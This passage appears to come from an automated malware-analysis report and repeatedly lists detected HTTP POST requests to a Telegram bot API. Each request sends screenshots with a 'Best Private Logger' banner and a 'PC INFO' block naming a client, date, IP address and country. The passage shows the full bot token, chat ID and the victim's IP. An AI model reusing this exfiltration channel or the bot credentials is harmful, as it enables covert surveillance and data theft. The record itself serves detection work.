20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1b95b9171c0fHost: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1bce777f00f4Host: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1c056c2add6fHost: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1c3bef997f68Host: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1c70b312a3b0Host: api.telegram.orgContent-Length: 667806Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1caf7fff02abHost: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1cfea10da911Host: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d5c756d9117Host: api.telegram.orgContent-Length: 675857Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1dc3a18d066fHost: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e4fdc10329cHost: api.telegram.orgContent-Length: 667943Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f0320b05febHost: api.telegram.orgContent-Length: 675718Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%